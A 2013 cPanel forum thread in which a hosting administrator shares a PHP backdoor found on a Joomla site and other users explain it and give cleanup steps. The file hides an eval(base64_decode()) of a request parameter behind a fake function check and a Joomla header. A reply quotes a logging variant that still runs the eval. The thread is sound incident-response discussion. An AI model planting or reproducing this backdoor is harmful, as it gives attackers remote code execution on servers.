afradata

Registered
Feb 14, 2013
3
0
1
cPanel Access Level
Root Administrator
Hi 2 all

Sorry my English is not good

i have a cpanel shared hosting . my server is in xlhost dc

I've received a few BroBot Malware complaints from bank of america

xlhost find user and file hve abuse and send me user information

Malware file is a php cod whene see url on browser open joomla administrator login page

php code file. please see it

PHP:
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
/**
* @version		$Id: index3.php 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

$_REQUEST['tmpl'] = 'component';
include('index.php');
?>
please help me to finde this file on my serverand remove it or block it

Thanks All
 

srpurdy

Well-Known Member
Jun 1, 2011
101
0
66
cPanel Access Level
Root Administrator
Hi 2 all

Sorry my English is not good

i have a cpanel shared hosting . my server is in xlhost dc

I've received a few BroBot Malware complaints from bank of america

xlhost find user and file hve abuse and send me user information

Malware file is a php cod whene see url on browser open joomla administrator login page

php code file. please see it

PHP:
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
/**
* @version		$Id: index3.php 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

$_REQUEST['tmpl'] = 'component';
include('index.php');
?>
please help me to finde this file on my serverand remove it or block it

Thanks All
Nothing looks unusal in that file. It's more likely a either a mysql injection, or the index.php file (or htaccess) So I would start by looking at the index.php file, and the .htaccess file.

Although that eval() function looks odd.. But it's only requesting infomation. So there has to be a connection to the index.php file
 
Last edited:

brianoz

Well-Known Member
Mar 13, 2004
1,146
6
168
Melbourne, Australia
cPanel Access Level
Root Administrator
Nothing looks unusal in that file. It's more likely a either a mysql injection, or the index.php file (or htaccess) So I would start by looking at the index.php file, and the .htaccess file.

Although that eval() function looks odd.. But it's only requesting infomation. So there has to be a connection to the index.php file
This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

You can almost certainly safely remove that first line in it's entirety and you should then be secure.
 
  • Like
Reactions: SageBrian

cPanelJamyn

Social Engineer
Staff member
Jan 29, 2009
105
2
143
This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. <snip> You can almost certainly safely remove that first line in it's entirety and you should then be secure.
Well, to clarify - if you remove the function_exists('date_default_timezone') ? line, the backdoor will be removed. It's still important to:

1. determine how they got in. Presumably you are running an old, exploitable version of Joomla (or an old plugin for the platform). It's critical that you keep it up to date, as it's a popular target with a lot of vulnerabilities.

2. clean up. Search all the files for that (or similar) lines. If they were smart, they'd install at least 3-4 backdoors in the hopes you'll miss one.

3. ensure all software is up to date. If you have Wordpress or Drupal or other PHP apps on the account(s), update those too.

4. reset your passwords. They got in once already, so make sure you have new passwords.

Ideally, you'd do a complete recreation of the account after a compromise (install new software, restore the DB data, etc), but I understand that's sometimes not possible.
 

bibiloi

Registered
Mar 8, 2013
1
0
1
cPanel Access Level
Root Administrator
This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

You can almost certainly safely remove that first line in it's entirety and you should then be secure.
Modifing the php file to print what that c_id variable contains to something like that:

cat web/components/news2.class.bak.php
<?php
if(function_exists('date_default_timezone'))
{
date_default_timezone_set('America/Los_Angeles');
}
else
{
$ft = @fopen("/tmp/hacker.tmp","ab");
if($ft)
{
fwrite($ft,base64_decode($_REQUEST["c_id"])."\r\n\r\n");
fclose($ft);
}
@eval(base64_decode($_REQUEST['c_id']));
}
After a POST :

195.56.77.46 - - [08/Mar/2013:10:32:01 +0100] "POST /components/news2.class.bak.php HTTP/1.1" 403 15 "-" "Mozilla/5.0 Firefox/3.6.12"
this is what contains the /tmp/hacker.tmp file:

- snipped -
 
Last edited by a moderator: